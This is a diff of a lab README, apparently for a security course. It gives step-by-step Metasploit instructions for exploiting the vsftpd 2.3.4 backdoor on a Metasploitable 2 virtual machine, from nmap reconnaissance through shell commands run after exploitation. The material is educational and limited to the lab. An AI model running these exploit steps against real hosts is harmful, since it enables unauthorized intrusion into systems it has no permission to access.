KanishkaPandita/Offensive-Defensive-Lab/Experiment 2/Readme.md

-Experiment 2: Simulated Ethical Hacking with Metasploit
+Experiment 2: Simulated Ethical Hacking with Metasploit Objective

-Objective

-To perform a safe exploitation of a vulnerable virtual machine using Metasploit and understand the basic ethical hacking procedure.
+To perform a safe exploitation exercise on a virtual machine using Metasploit and understand the basic stages of ethical hacking.

+Environment
+Kali Linux (Attacker)
+Metasploitable 2 (Victim/Test)
+VirtualBox or VMware
+Host-Only Adapter or Internal Network
 Procedure

-Step 1: Start Virtual Machines
+Step 1: Configure Virtual Machines

-Start the Kali Linux and Metasploitable virtual machines and ensure they are connected to the same virtual network.
+Install Kali Linux and Metasploitable 2, configure both machines with a Host-Only Adapter or Internal Network, and boot both machines.

-"Step 1 Screenshot" (images/step1-start-vms.png)

----

-Step 2: Identify Target IP Address
+Step 2: Verify Network Connectivity

-Determine the IP address of the Metasploitable machine using ifconfig.
+Check the IP address of Metasploitable 2 and verify connectivity from Kali Linux.

-The IP address of the target machine is identified from the Metasploitable machine.

-"Step 2 Screenshot 1" (images/step2-metasploitable-ip.png)

-"Step 2 Screenshot 2" (images/step2-kali-ip.png)

----

-Step 3: Use Nmap to Identify Open Ports and Available Services
+On Metasploitable 2:

+ifconfig
+On Kali Linux:

+ping <Metasploitable_IP>
+Step 3: Perform Reconnaissance
-Use Nmap from the Kali Linux machine to identify open ports and available services.
+Scan Metasploitable 2 to identify open ports, services, and operating system details.

+nmap -sS -sV -O <Metasploitable_IP>
+Step 4: Save Nmap Results
+Save the scan results into a text file.

-nmap -sV 192.168.42.136
+nmap -sS -sV -O -oN metasploitable_scan.txt <Metasploitable_IP>

-"Step 3 Screenshot" (images/step3-nmap.png)

----

-Step 4: Launch Metasploit Framework
+Step 5: Launch Metasploit

-Open the Metasploit console using msfconsole.
+Start the Metasploit Framework.

-"Step 4 Screenshot" (images/step4-msfconsole.png)

----
+msfconsole

-Step 5: Search for a Suitable Exploit
+Step 6: Search for the Exploit

-Search the Metasploit database for an exploit corresponding to a vulnerable service on the target.
+Search for the vsftpd exploit.

 search vsftpd

-"Step 5 Screenshot" (images/step5-search-vsftpd.png)

----

-Step 6: Select and Configure Exploit
+Step 7: Select the Exploit Module

-Select the required exploit and configure the target IP address.
+Select the vsftpd 2.3.4 backdoor exploit module.

 use exploit/unix/ftp/vsftpd_234_backdoor

-Configure the required exploit options, including the target and port.
+Step 8: Set the Target Host
+Set the IP address of the Metasploitable 2 machine.

+set RHOST <Metasploitable_IP>
+Step 9: Set the Target Port
+Set the FTP service port.

-RPORT: 21
+set RPORT 21

-"Step 6 Screenshot" (images/step6-configure-exploit.png)

----

-Step 7: Execute Exploit
+Step 10: Execute the Exploit

-Run the exploit against the authorized Metasploitable virtual machine.
+Execute the exploit against the Metasploitable 2 test machine.

 exploit

-"Step 7 Screenshot" (images/step7-execute-exploit.png)

----
+Step 11: Verify the Shell and System Information Verify the command shell and gather basic system information.

+whoami
+uname -a
+ifconfig
+Step 12: Check Processes and Network Services
+View running processes and listening network services.

+ps aux
+netstat -tulnp
+Step 13: Create and View a Test File
+Create and view a test file on the target machine.

+echo "This is a test file" > /tmp/test.txt cat /tmp/test.txt
-Step 8: Verify the Result
+Result

-Observe the Metasploit output and verify whether a session was successfully established.

----

-Demo Video

-"Watch the Experiment 2 Demo" (demo/demo-video-link.md)
+The target machine was scanned, a known vulnerable service was identified, and a controlled exploitation exercise was performed using Metasploit in the lab environment.

+Conclusion
+The experiment demonstrated the basic process of reconnaissance, exploitation, and post-exploitation using Nmap and Metasploit in a controlled virtual environment.

+Ethical Consideration
+This experiment should be performed only on the provided Metasploitable 2 test machine or another explicitly authorized lab environment.